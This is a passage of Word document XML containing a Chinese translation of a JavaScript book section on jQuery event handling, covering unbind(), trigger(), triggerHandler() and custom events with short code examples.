        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').unbind("click.ns1.ns2");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想小心地只取消绑定自己注册的事件处理程序，但没有使用命名空间，必须保留事件处理程序函数的一个引用，并使用</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>带两个参数的版本。在这种形式下，第一个参数是事件类型字符串（不带命名空间），第二个参数是处理程序函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#</w:t>
      </w:r>
      <w:r>
        <w:t>mybutton').unbind('click',myClickHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过这种方式调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的所有元素中注销特定类型的指定事件处理程序函数。注意，即便使用有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个参数的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>通过额外的数据值注册事件处理程序，也可以使用有两个参数的</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>事件来取消绑定它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以传递单一对象参数给</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>。在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>会轮询为该对象的每一属性调用一次。属性名会用做事件类型字符串，属性值会用做处理程序函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').unbind({//Remove specific mouseover and mouseout handlers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>mouseover:mouseoverHandler,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>mouseout:mouseoutHandler</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最后，还有一种方式来调用</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>。如果传递一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象给</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>，它会取消绑定传入事件的事件处理程序。调用</w:t>
      </w:r>
      <w:r>
        <w:t>unbind(e v)</w:t>
      </w:r>
      <w:r>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:t>unbind(e v.type,ev.handler)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="484" w:name="19_4_6_Chu_Fa_Shi_Jian_"/>
      <w:r>
        <w:t>19.4.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　触发事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用户使用鼠标</w:t>
      </w:r>
      <w:r>
        <w:t>、键盘或触发其他事件类型时，注册的事件处理程序会自动调用。然而，如果能手动触发事件，有时会很有用。手动触发事件最简单的方式是不带参数调用事件注册的简单方法（比如</w:t>
      </w:r>
      <w:r>
        <w:t>click()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover()</w:t>
      </w:r>
      <w:r>
        <w:t>）。与很多</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以同时用做做</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>一样，这些事件方法在带有一个参数时会注册事件处理程序，不带参数调用时则会触发事件处理程序。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#my_form").submit();//</w:t>
      </w:r>
      <w:r>
        <w:t>就和用户单击提交按钮一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面的</w:t>
      </w:r>
      <w:r>
        <w:t>submit()</w:t>
      </w:r>
      <w:r>
        <w:t>方法自己合成了一个</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并触发了给</w:t>
      </w:r>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:r>
        <w:t>bmit</w:t>
      </w:r>
      <w:r>
        <w:t>事件注册的所有事件处理程序。如果这些事件处理程序都没有返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或调用</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>，实际上将提交该表单。注意，通过这种方式手动调用时，冒泡事件依旧会冒泡。这意味着触发一组选中元素的事件，同时也会触发这些元素祖先节点的处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要特别注意，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的事件触发方法会触发所有使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件注册方法注册的处理程序，也会触发通过</w:t>
      </w:r>
      <w:r>
        <w:t>onsubmit</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性或</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义的处理程序。但是，不能手动触发使用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:t>tachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>注册的事件处理程序（当然，在真实事件触发时，这些处理程序依旧会调用。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同时需要注意，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的事件触发机制是同步的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>不涉及事件队列。当触发一个事件时，在调用的触发方法返回之前，事件处理程序会立刻调用。如果触发了一个单击事件，被触发的处理程序又触发了一个</w:t>
      </w:r>
      <w:r>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:t>事件，所有匹配的</w:t>
      </w:r>
      <w:r>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序会在调用下一个单击处理器之前调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>绑定和触发事件时，</w:t>
      </w:r>
      <w:r>
        <w:t>submit()</w:t>
      </w:r>
      <w:r>
        <w:t>这种方法很便捷，但就如</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个更通用的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了一个更通用的</w:t>
      </w:r>
      <w:r>
        <w:t>tri</w:t>
      </w:r>
      <w:r>
        <w:t>gger()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。通常，调用</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>时会传入事件类型字符串作为第一个参数，</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>会在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的所有元素上触发为该类型事件注册的所有处理程序。因此，上面的</w:t>
      </w:r>
      <w:r>
        <w:t>submit()</w:t>
      </w:r>
      <w:r>
        <w:t>调用等价于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#my_form").trigger("submit");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不同，在传入的字符串中不能指定多个事件类型。然而，与</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>一样的是，可以指定事件命名空间来触发仅在该命名空间中定义的处理程序。如果只想触发没有命名空间的事件处理程序，在</w:t>
      </w:r>
      <w:r>
        <w:t>事件类型后添加一个感叹号就行。通过</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>等属性注册的处理程序被认为是没有命名空间的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("button").trigger("click.ns1");//</w:t>
      </w:r>
      <w:r>
        <w:t>触发某个命名空间下的单击处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("button").trigger("click!");//</w:t>
      </w:r>
      <w:r>
        <w:t>触发没有命名空间的单击处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了给</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>传入事件类型字符串作为第一个参数，还可以传入</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象（或任何有</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性的对象）。</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性会用来判断触发什么类型的处理程序。如果传入的是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象，该对象会传递给触发的</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序。如果传入的是普通对象，会创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象，普通对象的属性会添加到新对象中。这样，可以很容易传递额外数据给事件处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//button1</w:t>
      </w:r>
      <w:r>
        <w:t>的单击处理程序触发</w:t>
      </w:r>
      <w:r>
        <w:t>button2</w:t>
      </w:r>
      <w:r>
        <w:t>上的相同事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#button1').click(function(e){$('#button2').trigger(e);});//</w:t>
      </w:r>
      <w:r>
        <w:t>触发事件时，添加额外的属性给事件对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#button1').trigger({type:'click',synthetic:true});//</w:t>
      </w:r>
      <w:r>
        <w:t>该处理程序检测额外属</w:t>
      </w:r>
      <w:r>
        <w:t>性来区分是真实事件还是虚假事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#button1').click(function(e){if(e.synthetic){...};});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>给事件处理程序传递额外数据的另一种方式是，在手动触发事件时，给</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>传入第二个参数。给</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>传入的第二个参数会成为每个触发的事件处理程序的第二个参数。如果传入数组作为第二个参数，数组的每一项会作为独立参数传递给触发的处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#button1').trigger("click",true);//</w:t>
      </w:r>
      <w:r>
        <w:t>传入单一额外参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#button1').trigger("click",[x,y,z]);//</w:t>
      </w:r>
      <w:r>
        <w:t>传入三个额外参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有时，会想触发给定事件类型的所有处理程序，而不管这些处理程序是绑定到什么文档元素上的。这时可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>$('*')</w:t>
      </w:r>
      <w:r>
        <w:t>来选中所有元素，然后对结果调用</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>，可是这样做非常低效。更好的方式是，使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.event.trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数，来全局触发事件。该函数接受的参数和</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样，但在整个文档中触发指定事件类型的事件处理程序时更高效。注意，以这种方式触发的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>全局事件</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>不会冒泡</w:t>
      </w:r>
      <w:r>
        <w:t>，并且只会触发使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法注册的处理程序（不包括用</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>属性注册的事件处理程序）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>（及调用它的便捷方法）在调用事件处理程序后，会执行与触发事件相关联的默认操作（假设事件处理程序没有返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或调用事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>）。例如，触发一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>orm</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:t>事件时，</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>会调用该表单的</w:t>
      </w:r>
      <w:r>
        <w:t>submit()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，如果触发一个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>会调用该元素的</w:t>
      </w:r>
      <w:r>
        <w:t>focus()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想调用事件处理程序，但不</w:t>
      </w:r>
      <w:r>
        <w:t>执行默认操作，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>triggerHandler()</w:t>
      </w:r>
      <w:r>
        <w:t>替代</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>。该方法和</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>类似，除了首先会调用</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>cancelBubble()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。这意味着通过</w:t>
      </w:r>
      <w:r>
        <w:t>triggerHandler()</w:t>
      </w:r>
      <w:r>
        <w:t>手动触发的事件不会冒泡，也不会执行相关联的默认操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="485" w:name="19_4_7_Zi_Ding_Yi_Shi_Jian_"/>
      <w:r>
        <w:t>19.4.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　自定义事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="485"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的事件管理体系是为标准事件设计的，比如</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器产生的鼠标单击和按键按下。但是，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>不限于这些事件，你可以使用任何想用的字符串来作为事件类型名称。使用</w:t>
      </w:r>
      <w:r>
        <w:t>bind</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>可以注册这种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>自定义事件</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的处理程序，使用</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>可以调用这些处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于书写模块化代码，实现发布</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>订阅模型或观察者模式时，这种自定义事件处理程序的间接调用被证明是非常有用的。使用自定义事件时，通常你会发现，使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.event.trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>函数替代</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，来全局触发处理器会更有用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用户单击</w:t>
      </w:r>
      <w:r>
        <w:t>"logoff"</w:t>
      </w:r>
      <w:r>
        <w:t>按钮时，广播一个自定义事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>给任何需要保存状态的感兴趣的观察者，然后</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>导航到</w:t>
      </w:r>
      <w:r>
        <w:t>logoff</w:t>
      </w:r>
      <w:r>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#logoff").click(func</w:t>
      </w:r>
      <w:r>
        <w:t>tion(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$.event.trigger("logoff");//</w:t>
      </w:r>
      <w:r>
        <w:t>广播一个事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.location="logoff.php";//</w:t>
      </w:r>
      <w:r>
        <w:t>导航到新页面</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w:t>
      </w:r>
      <w:r>
        <w:t>19.6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节我们将看到</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>方法会像上面这样广播自定义事件，以通知感兴趣的监听器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
